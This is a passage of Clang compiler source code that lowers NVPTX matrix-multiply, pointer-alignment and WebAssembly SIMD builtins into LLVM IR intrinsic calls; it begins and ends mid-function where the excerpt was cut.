case NVPTX::BI__mma_tf32_m16n16k8_mma_f32: {
Address Dst = EmitPointerWithAlignment(E->getArg(0));
Address SrcA = EmitPointerWithAlignment(E->getArg(1));
Address SrcB = EmitPointerWithAlignment(E->getArg(2));
Address SrcC = EmitPointerWithAlignment(E->getArg(3));
Optional<llvm::APSInt> LayoutArg =
E->getArg(4)->getIntegerConstantExpr(getContext());
if (!LayoutArg)
return nullptr;
int Layout = LayoutArg->getSExtValue();
if (Layout < 0 || Layout > 3)
return nullptr;
llvm::APSInt SatfArg;
if (BuiltinID == NVPTX::BI__bmma_m8n8k128_mma_xor_popc_b1 ||
BuiltinID == NVPTX::BI__bmma_m8n8k128_mma_and_popc_b1)
SatfArg = 0; // .b1 does not have satf argument.
else if (Optional<llvm::APSInt> OptSatfArg =
E->getArg(5)->getIntegerConstantExpr(getContext()))
SatfArg = *OptSatfArg;
else
return nullptr;
bool Satf = SatfArg.getSExtValue();
NVPTXMmaInfo MI = getNVPTXMmaInfo(BuiltinID);
unsigned IID = MI.getMMAIntrinsic(Layout, Satf);
if (IID == 0) // Unsupported combination of Layout/Satf.
return nullptr;
SmallVector<Value *, 24> Values;
Function *Intrinsic = CGM.getIntrinsic(IID);
llvm::Type *AType = Intrinsic->getFunctionType()->getParamType(0);
// Load A
for (unsigned i = 0; i < MI.NumEltsA; ++i) {
Value *V = Builder.CreateAlignedLoad(
SrcA.getElementType(),
Builder.CreateGEP(SrcA.getElementType(), SrcA.getPointer(),
llvm::ConstantInt::get(IntTy, i)),
CharUnits::fromQuantity(4));
Values.push_back(Builder.CreateBitCast(V, AType));
}
// Load B
llvm::Type *BType = Intrinsic->getFunctionType()->getParamType(MI.NumEltsA);
for (unsigned i = 0; i < MI.NumEltsB; ++i) {
Value *V = Builder.CreateAlignedLoad(
SrcB.getElementType(),
Builder.CreateGEP(SrcB.getElementType(), SrcB.getPointer(),
llvm::ConstantInt::get(IntTy, i)),
CharUnits::fromQuantity(4));
Values.push_back(Builder.CreateBitCast(V, BType));
}
// Load C
llvm::Type *CType =
Intrinsic->getFunctionType()->getParamType(MI.NumEltsA + MI.NumEltsB);
for (unsigned i = 0; i < MI.NumEltsC; ++i) {
Value *V = Builder.CreateAlignedLoad(
SrcC.getElementType(),
Builder.CreateGEP(SrcC.getElementType(), SrcC.getPointer(),
llvm::ConstantInt::get(IntTy, i)),
CharUnits::fromQuantity(4));
Values.push_back(Builder.CreateBitCast(V, CType));
}
Value *Result = Builder.CreateCall(Intrinsic, Values);
llvm::Type *DType = Dst.getElementType();
for (unsigned i = 0; i < MI.NumEltsD; ++i)
Builder.CreateAlignedStore(
Builder.CreateBitCast(Builder.CreateExtractValue(Result, i), DType),
Builder.CreateGEP(Dst.getElementType(), Dst.getPointer(),
llvm::ConstantInt::get(IntTy, i)),
CharUnits::fromQuantity(4));
return Result;
}
default:
return nullptr;
}
}
namespace {
struct BuiltinAlignArgs {
llvm::Value *Src = nullptr;
llvm::Type *SrcType = nullptr;
llvm::Value *Alignment = nullptr;
llvm::Value *Mask = nullptr;
llvm::IntegerType *IntType = nullptr;
BuiltinAlignArgs(const CallExpr *E, CodeGenFunction &CGF) {
QualType AstType = E->getArg(0)->getType();
if (AstType->isArrayType())
Src = CGF.EmitArrayToPointerDecay(E->getArg(0)).getPointer();
else
Src = CGF.EmitScalarExpr(E->getArg(0));
SrcType = Src->getType();
if (SrcType->isPointerTy()) {
IntType = IntegerType::get(
CGF.getLLVMContext(),
CGF.CGM.getDataLayout().getIndexTypeSizeInBits(SrcType));
} else {
assert(SrcType->isIntegerTy());
IntType = cast<llvm::IntegerType>(SrcType);
}
Alignment = CGF.EmitScalarExpr(E->getArg(1));
Alignment = CGF.Builder.CreateZExtOrTrunc(Alignment, IntType, "alignment");
auto *One = llvm::ConstantInt::get(IntType, 1);
Mask = CGF.Builder.CreateSub(Alignment, One, "mask");
}
};
} // namespace
/// Generate (x & (y-1)) == 0.
RValue CodeGenFunction::EmitBuiltinIsAligned(const CallExpr *E) {
BuiltinAlignArgs Args(E, *this);
llvm::Value *SrcAddress = Args.Src;
if (Args.SrcType->isPointerTy())
SrcAddress =
Builder.CreateBitOrPointerCast(Args.Src, Args.IntType, "src_addr");
return RValue::get(Builder.CreateICmpEQ(
Builder.CreateAnd(SrcAddress, Args.Mask, "set_bits"),
llvm::Constant::getNullValue(Args.IntType), "is_aligned"));
}
/// Generate (x & ~(y-1)) to align down or ((x+(y-1)) & ~(y-1)) to align up.
/// Note: For pointer types we can avoid ptrtoint/inttoptr pairs by using the
/// llvm.ptrmask instrinsic (with a GEP before in the align_up case).
/// TODO: actually use ptrmask once most optimization passes know about it.
RValue CodeGenFunction::EmitBuiltinAlignTo(const CallExpr *E, bool AlignUp) {
BuiltinAlignArgs Args(E, *this);
llvm::Value *SrcAddr = Args.Src;
if (Args.Src->getType()->isPointerTy())
SrcAddr = Builder.CreatePtrToInt(Args.Src, Args.IntType, "intptr");
llvm::Value *SrcForMask = SrcAddr;
if (AlignUp) {
// When aligning up we have to first add the mask to ensure we go over the
// next alignment value and then align down to the next valid multiple.
// By adding the mask, we ensure that align_up on an already aligned
// value will not change the value.
SrcForMask = Builder.CreateAdd(SrcForMask, Args.Mask, "over_boundary");
}
// Invert the mask to only clear the lower bits.
llvm::Value *InvertedMask = Builder.CreateNot(Args.Mask, "inverted_mask");
llvm::Value *Result =
Builder.CreateAnd(SrcForMask, InvertedMask, "aligned_result");
if (Args.Src->getType()->isPointerTy()) {
/// TODO: Use ptrmask instead of ptrtoint+gep once it is optimized well.
// Result = Builder.CreateIntrinsic(
// Intrinsic::ptrmask, {Args.SrcType, SrcForMask->getType(), Args.IntType},
// {SrcForMask, NegatedMask}, nullptr, "aligned_result");
Result->setName("aligned_intptr");
llvm::Value *Difference = Builder.CreateSub(Result, SrcAddr, "diff");
// The result must point to the same underlying allocation. This means we
// can use an inbounds GEP to enable better optimization.
Value *Base = EmitCastToVoidPtr(Args.Src);
if (getLangOpts().isSignedOverflowDefined())
Result = Builder.CreateGEP(Int8Ty, Base, Difference, "aligned_result");
else
Result = EmitCheckedInBoundsGEP(Base, Difference,
/*SignedIndices=*/true,
/*isSubtraction=*/!AlignUp,
E->getExprLoc(), "aligned_result");
Result = Builder.CreatePointerCast(Result, Args.SrcType);
// Emit an alignment assumption to ensure that the new alignment is
// propagated to loads/stores, etc.
emitAlignmentAssumption(Result, E, E->getExprLoc(), Args.Alignment);
}
assert(Result->getType() == Args.SrcType);
return RValue::get(Result);
}
Value *CodeGenFunction::EmitWebAssemblyBuiltinExpr(unsigned BuiltinID,
const CallExpr *E) {
switch (BuiltinID) {
case WebAssembly::BI__builtin_wasm_memory_size: {
llvm::Type *ResultType = ConvertType(E->getType());
Value *I = EmitScalarExpr(E->getArg(0));
Function *Callee =
CGM.getIntrinsic(Intrinsic::wasm_memory_size, ResultType);
return Builder.CreateCall(Callee, I);
}
case WebAssembly::BI__builtin_wasm_memory_grow: {
llvm::Type *ResultType = ConvertType(E->getType());
Value *Args[] = {EmitScalarExpr(E->getArg(0)),
EmitScalarExpr(E->getArg(1))};
Function *Callee =
CGM.getIntrinsic(Intrinsic::wasm_memory_grow, ResultType);
return Builder.CreateCall(Callee, Args);
}
case WebAssembly::BI__builtin_wasm_tls_size: {
llvm::Type *ResultType = ConvertType(E->getType());
Function *Callee = CGM.getIntrinsic(Intrinsic::wasm_tls_size, ResultType);
return Builder.CreateCall(Callee);
}
case WebAssembly::BI__builtin_wasm_tls_align: {
llvm::Type *ResultType = ConvertType(E->getType());
Function *Callee = CGM.getIntrinsic(Intrinsic::wasm_tls_align, ResultType);
return Builder.CreateCall(Callee);
}
case WebAssembly::BI__builtin_wasm_tls_base: {
Function *Callee = CGM.getIntrinsic(Intrinsic::wasm_tls_base);
return Builder.CreateCall(Callee);
}
case WebAssembly::BI__builtin_wasm_throw: {
Value *Tag = EmitScalarExpr(E->getArg(0));
Value *Obj = EmitScalarExpr(E->getArg(1));
Function *Callee = CGM.getIntrinsic(Intrinsic::wasm_throw);
return Builder.CreateCall(Callee, {Tag, Obj});
}
case WebAssembly::BI__builtin_wasm_rethrow: {
Function *Callee = CGM.getIntrinsic(Intrinsic::wasm_rethrow);
return Builder.CreateCall(Callee);
}
case WebAssembly::BI__builtin_wasm_memory_atomic_wait32: {
Value *Addr = EmitScalarExpr(E->getArg(0));
Value *Expected = EmitScalarExpr(E->getArg(1));
Value *Timeout = EmitScalarExpr(E->getArg(2));
Function *Callee = CGM.getIntrinsic(Intrinsic::wasm_memory_atomic_wait32);
return Builder.CreateCall(Callee, {Addr, Expected, Timeout});
}
case WebAssembly::BI__builtin_wasm_memory_atomic_wait64: {
Value *Addr = EmitScalarExpr(E->getArg(0));
Value *Expected = EmitScalarExpr(E->getArg(1));
Value *Timeout = EmitScalarExpr(E->getArg(2));
Function *Callee = CGM.getIntrinsic(Intrinsic::wasm_memory_atomic_wait64);
return Builder.CreateCall(Callee, {Addr, Expected, Timeout});
}
case WebAssembly::BI__builtin_wasm_memory_atomic_notify: {
Value *Addr = EmitScalarExpr(E->getArg(0));
Value *Count = EmitScalarExpr(E->getArg(1));
Function *Callee = CGM.getIntrinsic(Intrinsic::wasm_memory_atomic_notify);
return Builder.CreateCall(Callee, {Addr, Count});
}
case WebAssembly::BI__builtin_wasm_trunc_s_i32_f32:
case WebAssembly::BI__builtin_wasm_trunc_s_i32_f64:
case WebAssembly::BI__builtin_wasm_trunc_s_i64_f32:
case WebAssembly::BI__builtin_wasm_trunc_s_i64_f64: {
Value *Src = EmitScalarExpr(E->getArg(0));
llvm::Type *ResT = ConvertType(E->getType());
Function *Callee =
CGM.getIntrinsic(Intrinsic::wasm_trunc_signed, {ResT, Src->getType()});
return Builder.CreateCall(Callee, {Src});
}
case WebAssembly::BI__builtin_wasm_trunc_u_i32_f32:
case WebAssembly::BI__builtin_wasm_trunc_u_i32_f64:
case WebAssembly::BI__builtin_wasm_trunc_u_i64_f32:
case WebAssembly::BI__builtin_wasm_trunc_u_i64_f64: {
Value *Src = EmitScalarExpr(E->getArg(0));
llvm::Type *ResT = ConvertType(E->getType());
Function *Callee = CGM.getIntrinsic(Intrinsic::wasm_trunc_unsigned,
{ResT, Src->getType()});
return Builder.CreateCall(Callee, {Src});
}
case WebAssembly::BI__builtin_wasm_trunc_saturate_s_i32_f32:
case WebAssembly::BI__builtin_wasm_trunc_saturate_s_i32_f64:
case WebAssembly::BI__builtin_wasm_trunc_saturate_s_i64_f32:
case WebAssembly::BI__builtin_wasm_trunc_saturate_s_i64_f64:
case WebAssembly::BI__builtin_wasm_trunc_saturate_s_i32x4_f32x4: {
Value *Src = EmitScalarExpr(E->getArg(0));
llvm::Type *ResT = ConvertType(E->getType());
Function *Callee =
CGM.getIntrinsic(Intrinsic::fptosi_sat, {ResT, Src->getType()});
return Builder.CreateCall(Callee, {Src});
}
case WebAssembly::BI__builtin_wasm_trunc_saturate_u_i32_f32:
case WebAssembly::BI__builtin_wasm_trunc_saturate_u_i32_f64:
case WebAssembly::BI__builtin_wasm_trunc_saturate_u_i64_f32:
case WebAssembly::BI__builtin_wasm_trunc_saturate_u_i64_f64:
case WebAssembly::BI__builtin_wasm_trunc_saturate_u_i32x4_f32x4: {
Value *Src = EmitScalarExpr(E->getArg(0));
llvm::Type *ResT = ConvertType(E->getType());
Function *Callee =
CGM.getIntrinsic(Intrinsic::fptoui_sat, {ResT, Src->getType()});
return Builder.CreateCall(Callee, {Src});
}
case WebAssembly::BI__builtin_wasm_min_f32:
case WebAssembly::BI__builtin_wasm_min_f64:
case WebAssembly::BI__builtin_wasm_min_f32x4:
case WebAssembly::BI__builtin_wasm_min_f64x2: {
Value *LHS = EmitScalarExpr(E->getArg(0));
Value *RHS = EmitScalarExpr(E->getArg(1));
Function *Callee =
CGM.getIntrinsic(Intrinsic::minimum, ConvertType(E->getType()));
return Builder.CreateCall(Callee, {LHS, RHS});
}
case WebAssembly::BI__builtin_wasm_max_f32:
case WebAssembly::BI__builtin_wasm_max_f64:
case WebAssembly::BI__builtin_wasm_max_f32x4:
case WebAssembly::BI__builtin_wasm_max_f64x2: {
Value *LHS = EmitScalarExpr(E->getArg(0));
Value *RHS = EmitScalarExpr(E->getArg(1));
Function *Callee =
CGM.getIntrinsic(Intrinsic::maximum, ConvertType(E->getType()));
return Builder.CreateCall(Callee, {LHS, RHS});
}
case WebAssembly::BI__builtin_wasm_pmin_f32x4:
case WebAssembly::BI__builtin_wasm_pmin_f64x2: {
Value *LHS = EmitScalarExpr(E->getArg(0));
Value *RHS = EmitScalarExpr(E->getArg(1));
Function *Callee =
CGM.getIntrinsic(Intrinsic::wasm_pmin, ConvertType(E->getType()));
return Builder.CreateCall(Callee, {LHS, RHS});
}
case WebAssembly::BI__builtin_wasm_pmax_f32x4:
case WebAssembly::BI__builtin_wasm_pmax_f64x2: {
Value *LHS = EmitScalarExpr(E->getArg(0));
Value *RHS = EmitScalarExpr(E->getArg(1));
Function *Callee =
CGM.getIntrinsic(Intrinsic::wasm_pmax, ConvertType(E->getType()));
return Builder.CreateCall(Callee, {LHS, RHS});
}
case WebAssembly::BI__builtin_wasm_ceil_f32x4:
case WebAssembly::BI__builtin_wasm_floor_f32x4:
case WebAssembly::BI__builtin_wasm_trunc_f32x4:
case WebAssembly::BI__builtin_wasm_nearest_f32x4:
case WebAssembly::BI__builtin_wasm_ceil_f64x2:
case WebAssembly::BI__builtin_wasm_floor_f64x2:
case WebAssembly::BI__builtin_wasm_trunc_f64x2:
case WebAssembly::BI__builtin_wasm_nearest_f64x2: {
unsigned IntNo;
switch (BuiltinID) {
case WebAssembly::BI__builtin_wasm_ceil_f32x4:
case WebAssembly::BI__builtin_wasm_ceil_f64x2:
IntNo = Intrinsic::ceil;
break;
case WebAssembly::BI__builtin_wasm_floor_f32x4:
case WebAssembly::BI__builtin_wasm_floor_f64x2:
IntNo = Intrinsic::floor;
break;
case WebAssembly::BI__builtin_wasm_trunc_f32x4:
case WebAssembly::BI__builtin_wasm_trunc_f64x2:
IntNo = Intrinsic::trunc;
break;
case WebAssembly::BI__builtin_wasm_nearest_f32x4:
case WebAssembly::BI__builtin_wasm_nearest_f64x2:
IntNo = Intrinsic::nearbyint;
break;
default:
llvm_unreachable("unexpected builtin ID");
}
Value *Value = EmitScalarExpr(E->getArg(0));
Function *Callee = CGM.getIntrinsic(IntNo, ConvertType(E->getType()));
return Builder.CreateCall(Callee, Value);
}
case WebAssembly::BI__builtin_wasm_swizzle_i8x16: {
Value *Src = EmitScalarExpr(E->getArg(0));
Value *Indices = EmitScalarExpr(E->getArg(1));
Function *Callee = CGM.getIntrinsic(Intrinsic::wasm_swizzle);
return Builder.CreateCall(Callee, {Src, Indices});
}
case WebAssembly::BI__builtin_wasm_add_sat_s_i8x16:
case WebAssembly::BI__builtin_wasm_add_sat_u_i8x16:
case WebAssembly::BI__builtin_wasm_add_sat_s_i16x8:
case WebAssembly::BI__builtin_wasm_add_sat_u_i16x8:
case WebAssembly::BI__builtin_wasm_sub_sat_s_i8x16:
case WebAssembly::BI__builtin_wasm_sub_sat_u_i8x16:
case WebAssembly::BI__builtin_wasm_sub_sat_s_i16x8:
case WebAssembly::BI__builtin_wasm_sub_sat_u_i16x8: {
unsigned IntNo;
switch (BuiltinID) {
case WebAssembly::BI__builtin_wasm_add_sat_s_i8x16:
case WebAssembly::BI__builtin_wasm_add_sat_s_i16x8:
IntNo = Intrinsic::sadd_sat;
break;
case WebAssembly::BI__builtin_wasm_add_sat_u_i8x16:
case WebAssembly::BI__builtin_wasm_add_sat_u_i16x8:
IntNo = Intrinsic::uadd_sat;
break;
case WebAssembly::BI__builtin_wasm_sub_sat_s_i8x16:
case WebAssembly::BI__builtin_wasm_sub_sat_s_i16x8:
IntNo = Intrinsic::wasm_sub_sat_signed;
break;
case WebAssembly::BI__builtin_wasm_sub_sat_u_i8x16:
case WebAssembly::BI__builtin_wasm_sub_sat_u_i16x8:
IntNo = Intrinsic::wasm_sub_sat_unsigned;
break;
default:
llvm_unreachable("unexpected builtin ID");
}
Value *LHS = EmitScalarExpr(E->getArg(0));
Value *RHS = EmitScalarExpr(E->getArg(1));
Function *Callee = CGM.getIntrinsic(IntNo, ConvertType(E->getType()));
return Builder.CreateCall(Callee, {LHS, RHS});
}
case WebAssembly::BI__builtin_wasm_abs_i8x16:
case WebAssembly::BI__builtin_wasm_abs_i16x8:
case WebAssembly::BI__builtin_wasm_abs_i32x4:
case WebAssembly::BI__builtin_wasm_abs_i64x2: {
Value *Vec = EmitScalarExpr(E->getArg(0));
Value *Neg = Builder.CreateNeg(Vec, "neg");
Constant *Zero = llvm::Constant::getNullValue(Vec->getType());
Value *ICmp = Builder.CreateICmpSLT(Vec, Zero, "abscond");
return Builder.CreateSelect(ICmp, Neg, Vec, "abs");
}
case WebAssembly::BI__builtin_wasm_min_s_i8x16:
case WebAssembly::BI__builtin_wasm_min_u_i8x16:
case WebAssembly::BI__builtin_wasm_max_s_i8x16:
case WebAssembly::BI__builtin_wasm_max_u_i8x16:
case WebAssembly::BI__builtin_wasm_min_s_i16x8:
case WebAssembly::BI__builtin_wasm_min_u_i16x8:
case WebAssembly::BI__builtin_wasm_max_s_i16x8:
case WebAssembly::BI__builtin_wasm_max_u_i16x8:
case WebAssembly::BI__builtin_wasm_min_s_i32x4:
case WebAssembly::BI__builtin_wasm_min_u_i32x4:
case WebAssembly::BI__builtin_wasm_max_s_i32x4:
case WebAssembly::BI__builtin_wasm_max_u_i32x4: {
Value *LHS = EmitScalarExpr(E->getArg(0));
Value *RHS = EmitScalarExpr(E->getArg(1));
Value *ICmp;
switch (BuiltinID) {
case WebAssembly::BI__builtin_wasm_min_s_i8x16:
case WebAssembly::BI__builtin_wasm_min_s_i16x8:
case WebAssembly::BI__builtin_wasm_min_s_i32x4:
ICmp = Builder.CreateICmpSLT(LHS, RHS);
break;
case WebAssembly::BI__builtin_wasm_min_u_i8x16:
case WebAssembly::BI__builtin_wasm_min_u_i16x8:
case WebAssembly::BI__builtin_wasm_min_u_i32x4:
ICmp = Builder.CreateICmpULT(LHS, RHS);
break;
case WebAssembly::BI__builtin_wasm_max_s_i8x16:
case WebAssembly::BI__builtin_wasm_max_s_i16x8:
case WebAssembly::BI__builtin_wasm_max_s_i32x4:
ICmp = Builder.CreateICmpSGT(LHS, RHS);
break;
case WebAssembly::BI__builtin_wasm_max_u_i8x16:
case WebAssembly::BI__builtin_wasm_max_u_i16x8:
case WebAssembly::BI__builtin_wasm_max_u_i32x4:
ICmp = Builder.CreateICmpUGT(LHS, RHS);
break;
default:
llvm_unreachable("unexpected builtin ID");
}
return Builder.CreateSelect(ICmp, LHS, RHS);
}
case WebAssembly::BI__builtin_wasm_avgr_u_i8x16:
case WebAssembly::BI__builtin_wasm_avgr_u_i16x8: {
Value *LHS = EmitScalarExpr(E->getArg(0));
Value *RHS = EmitScalarExpr(E->getArg(1));
Function *Callee = CGM.getIntrinsic(Intrinsic::wasm_avgr_unsigned,
ConvertType(E->getType()));
return Builder.CreateCall(Callee, {LHS, RHS});
}
case WebAssembly::BI__builtin_wasm_q15mulr_sat_s_i16x8: {
Value *LHS = EmitScalarExpr(E->getArg(0));
Value *RHS = EmitScalarExpr(E->getArg(1));
Function *Callee = CGM.getIntrinsic(Intrinsic::wasm_q15mulr_sat_signed);
return Builder.CreateCall(Callee, {LHS, RHS});
}
case WebAssembly::BI__builtin_wasm_extadd_pairwise_i8x16_s_i16x8:
case WebAssembly::BI__builtin_wasm_extadd_pairwise_i8x16_u_i16x8:
case WebAssembly::BI__builtin_wasm_extadd_pairwise_i16x8_s_i32x4:
case WebAssembly::BI__builtin_wasm_extadd_pairwise_i16x8_u_i32x4: {
Value *Vec = EmitScalarExpr(E->getArg(0));
unsigned IntNo;
switch (BuiltinID) {
case WebAssembly::BI__builtin_wasm_extadd_pairwise_i8x16_s_i16x8:
case WebAssembly::BI__builtin_wasm_extadd_pairwise_i16x8_s_i32x4:
IntNo = Intrinsic::wasm_extadd_pairwise_signed;
break;
case WebAssembly::BI__builtin_wasm_extadd_pairwise_i8x16_u_i16x8:
case WebAssembly::BI__builtin_wasm_extadd_pairwise_i16x8_u_i32x4:
IntNo = Intrinsic::wasm_extadd_pairwise_unsigned;
break;
default:
llvm_unreachable("unexptected builtin ID");
}
Function *Callee = CGM.getIntrinsic(IntNo, ConvertType(E->getType()));
return Builder.CreateCall(Callee, Vec);
}
case WebAssembly::BI__builtin_wasm_bitselect: {
Value *V1 = EmitScalarExpr(E->getArg(0));
Value *V2 = EmitScalarExpr(E->getArg(1));
Value *C = EmitScalarExpr(E->getArg(2));
Function *Callee =
CGM.getIntrinsic(Intrinsic::wasm_bitselect, ConvertType(E->getType()));
return Builder.CreateCall(Callee, {V1, V2, C});
}
case WebAssembly::BI__builtin_wasm_dot_s_i32x4_i16x8: {
Value *LHS = EmitScalarExpr(E->getArg(0));
Value *RHS = EmitScalarExpr(E->getArg(1));
Function *Callee = CGM.getIntrinsic(Intrinsic::wasm_dot);
return Builder.CreateCall(Callee, {LHS, RHS});
}
case WebAssembly::BI__builtin_wasm_popcnt_i8x16: {
Value *Vec = EmitScalarExpr(E->getArg(0));
Function *Callee =
CGM.getIntrinsic(Intrinsic::ctpop, ConvertType(E->getType()));
return Builder.CreateCall(Callee, {Vec});
}
case WebAssembly::BI__builtin_wasm_any_true_v128:
case WebAssembly::BI__builtin_wasm_all_true_i8x16:
case WebAssembly::BI__builtin_wasm_all_true_i16x8:
case WebAssembly::BI__builtin_wasm_all_true_i32x4:
case WebAssembly::BI__builtin_wasm_all_true_i64x2: {
unsigned IntNo;
switch (BuiltinID) {
case WebAssembly::BI__builtin_wasm_any_true_v128:
IntNo = Intrinsic::wasm_anytrue;
break;
case WebAssembly::BI__builtin_wasm_all_true_i8x16:
case WebAssembly::BI__builtin_wasm_all_true_i16x8:
case WebAssembly::BI__builtin_wasm_all_true_i32x4:
case WebAssembly::BI__builtin_wasm_all_true_i64x2:
IntNo = Intrinsic::wasm_alltrue;
break;
default:
llvm_unreachable("unexpected builtin ID");
}
Value *Vec = EmitScalarExpr(E->getArg(0));
Function *Callee = CGM.getIntrinsic(IntNo, Vec->getType());
return Builder.CreateCall(Callee, {Vec});
}
case WebAssembly::BI__builtin_wasm_bitmask_i8x16:
case WebAssembly::BI__builtin_wasm_bitmask_i16x8:
case WebAssembly::BI__builtin_wasm_bitmask_i32x4:
case WebAssembly::BI__builtin_wasm_bitmask_i64x2: {
Value *Vec = EmitScalarExpr(E->getArg(0));
Function *Callee =
CGM.getIntrinsic(Intrinsic::wasm_bitmask, Vec->getType());
return Builder.CreateCall(Callee, {Vec});
}
case WebAssembly::BI__builtin_wasm_abs_f32x4:
case WebAssembly::BI__builtin_wasm_abs_f64x2: {
Value *Vec = EmitScalarExpr(E->getArg(0));
Function *Callee = CGM.getIntrinsic(Intrinsic::fabs, Vec->getType());
return Builder.CreateCall(Callee, {Vec});
}
case WebAssembly::BI__builtin_wasm_sqrt_f32x4:
case WebAssembly::BI__builtin_wasm_sqrt_f64x2: {
Value *Vec = EmitScalarExpr(E->getArg(0));
Function *Callee = CGM.getIntrinsic(Intrinsic::sqrt, Vec->getType());
return Builder.CreateCall(Callee, {Vec});
}
case WebAssembly::BI__builtin_wasm_narrow_s_i8x16_i16x8:
case WebAssembly::BI__builtin_wasm_narrow_u_i8x16_i16x8:
case WebAssembly::BI__builtin_wasm_narrow_s_i16x8_i32x4:
case WebAssembly::BI__builtin_wasm_narrow_u_i16x8_i32x4: {
Value *Low = EmitScalarExpr(E->getArg(0));
Value *High = EmitScalarExpr(E->getArg(1));
unsigned IntNo;
switch (BuiltinID) {
case WebAssembly::BI__builtin_wasm_narrow_s_i8x16_i16x8:
case WebAssembly::BI__builtin_wasm_narrow_s_i16x8_i32x4:
IntNo = Intrinsic::wasm_narrow_signed;
break;
case WebAssembly::BI__builtin_wasm_narrow_u_i8x16_i16x8:
case WebAssembly::BI__builtin_wasm_narrow_u_i16x8_i32x4:
IntNo = Intrinsic::wasm_narrow_unsigned;
break;
default:
llvm_unreachable("unexpected builtin ID");
}
Function *Callee =
CGM.getIntrinsic(IntNo, {ConvertType(E->getType()), Low->getType()});
return Builder.CreateCall(Callee, {Low, High});
}
case WebAssembly::BI__builtin_wasm_trunc_sat_zero_s_f64x2_i32x4:
case WebAssembly::BI__builtin_wasm_trunc_sat_zero_u_f64x2_i32x4: {
Value *Vec = EmitScalarExpr(E->getArg(0));
unsigned IntNo;
switch (BuiltinID) {
case WebAssembly::BI__builtin_wasm_trunc_sat_zero_s_f64x2_i32x4:
IntNo = Intrinsic::fptosi_sat;
break;
case WebAssembly::BI__builtin_wasm_trunc_sat_zero_u_f64x2_i32x4:
IntNo = Intrinsic::fptoui_sat;
break;
default:
llvm_unreachable("unexpected builtin ID");
}
llvm::Type *SrcT = Vec->getType();
llvm::Type *TruncT =
SrcT->getWithNewType(llvm::IntegerType::get(getLLVMContext(), 32));
Function *Callee = CGM.getIntrinsic(IntNo, {TruncT, SrcT});
Value *Trunc = Builder.CreateCall(Callee, Vec);
Value *Splat = Builder.CreateVectorSplat(2, Builder.getInt32(0));
Value *ConcatMask =
llvm::ConstantVector::get({Builder.getInt32(0), Builder.getInt32(1),
Builder.getInt32(2), Builder.getInt32(3)});
return Builder.CreateShuffleVector(Trunc, Splat, ConcatMask);
}
case WebAssembly::BI__builtin_wasm_shuffle_i8x16: {
Value *Ops[18];
size_t OpIdx = 0;
Ops[OpIdx++] = EmitScalarExpr(E->getArg(0));
Ops[OpIdx++] = EmitScalarExpr(E->getArg(1));
while (OpIdx < 18) {
Optional<llvm::APSInt> LaneConst =
E->getArg(OpIdx)->getIntegerConstantExpr(getContext());
assert(LaneConst && "Constant arg isn't actually constant?");
Ops[OpIdx++] = llvm::ConstantInt::get(getLLVMContext(), *LaneConst);
}
Function *Callee = CGM.getIntrinsic(Intrinsic::wasm_shuffle);
return Builder.CreateCall(Callee, Ops);
}
case WebAssembly::BI__builtin_wasm_fma_f32x4:
case WebAssembly::BI__builtin_wasm_fms_f32x4:
case WebAssembly::BI__builtin_wasm_fma_f64x2:
case WebAssembly::BI__builtin_wasm_fms_f64x2: {
Value *A = EmitScalarExpr(E->getArg(0));
Value *B = EmitScalarExpr(E->getArg(1));
Value *C = EmitScalarExpr(E->getArg(2));
unsigned IntNo;
switch (BuiltinID) {
case WebAssembly::BI__builtin_wasm_fma_f32x4:
case WebAssembly::BI__builtin_wasm_fma_f64x2:
IntNo = Intrinsic::wasm_fma;
break;
case WebAssembly::BI__builtin_wasm_fms_f32x4:
case WebAssembly::BI__builtin_wasm_fms_f64x2:
IntNo = Intrinsic::wasm_fms;
break;
default:
llvm_unreachable("unexpected builtin ID");
}
Function *Callee = CGM.getIntrinsic(IntNo, A->getType());
return Builder.CreateCall(Callee, {A, B, C});
}
case WebAssembly::BI__builtin_wasm_laneselect_i8x16:
case WebAssembly::BI__builtin_wasm_laneselect_i16x8:
case WebAssembly::BI__builtin_wasm_laneselect_i32x4:
case WebAssembly::BI__builtin_wasm_laneselect_i64x2: {
Value *A = EmitScalarExpr(E->getArg(0));
Value *B = EmitScalarExpr(E->getArg(1));
Value *C = EmitScalarExpr(E->getArg(2));
Function *Callee =
CGM.getIntrinsic(Intrinsic::wasm_laneselect, A->getType());
return Builder.CreateCall(Callee, {A, B, C});
}
case WebAssembly::BI__builtin_wasm_relaxed_swizzle_i8x16: {
Value *Src = EmitScalarExpr(E->getArg(0));
Value *Indices = EmitScalarExpr(E->getArg(1));
Function *Callee = CGM.getIntrinsic(Intrinsic::wasm_relaxed_swizzle);
return Builder.CreateCall(Callee, {Src, Indices});
}
case WebAssembly::BI__builtin_wasm_relaxed_min_f32x4:
case WebAssembly::BI__builtin_wasm_relaxed_max_f32x4:
case WebAssembly::BI__builtin_wasm_relaxed_min_f64x2:
case WebAssembly::BI__builtin_wasm_relaxed_max_f64x2: {
Value *LHS = EmitScalarExpr(E->getArg(0));
Value *RHS = EmitScalarExpr(E->getArg(1));
unsigned IntNo;
switch (BuiltinID) {
case WebAssembly::BI__builtin_wasm_relaxed_min_f32x4:
case WebAssembly::BI__builtin_wasm_relaxed_min_f64x2:
IntNo = Intrinsic::wasm_relaxed_min;
break;
case WebAssembly::BI__builtin_wasm_relaxed_max_f32x4:
case WebAssembly::BI__builtin_wasm_relaxed_max_f64x2:
IntNo = Intrinsic::wasm_relaxed_max;
break;
default:
llvm_unreachable("unexpected builtin ID");
}
Function *Callee = CGM.getIntrinsic(IntNo, LHS->getType());
return Builder.CreateCall(Callee, {LHS, RHS});
}
case WebAssembly::BI__builtin_wasm_relaxed_trunc_s_i32x4_f32x4:
case WebAssembly::BI__builtin_wasm_relaxed_trunc_u_i32x4_f32x4:
case WebAssembly::BI__builtin_wasm_relaxed_trunc_zero_s_i32x4_f64x2:
case WebAssembly::BI__builtin_wasm_relaxed_trunc_zero_u_i32x4_f64x2: {
Value *Vec = EmitScalarExpr(E->getArg(0));
unsigned IntNo;
switch (BuiltinID) {
case WebAssembly::BI__builtin_wasm_relaxed_trunc_s_i32x4_f32x4:
IntNo = Intrinsic::wasm_relaxed_trunc_signed;
break;
case WebAssembly::BI__builtin_wasm_relaxed_trunc_u_i32x4_f32x4:
IntNo = Intrinsic::wasm_relaxed_trunc_unsigned;
break;
case WebAssembly::BI__builtin_wasm_relaxed_trunc_zero_s_i32x4_f64x2:
IntNo = Intrinsic::wasm_relaxed_trunc_zero_signed;
break;
case WebAssembly::BI__builtin_wasm_relaxed_trunc_zero_u_i32x4_f64x2:
IntNo = Intrinsic::wasm_relaxed_trunc_zero_unsigned;
break;
default:
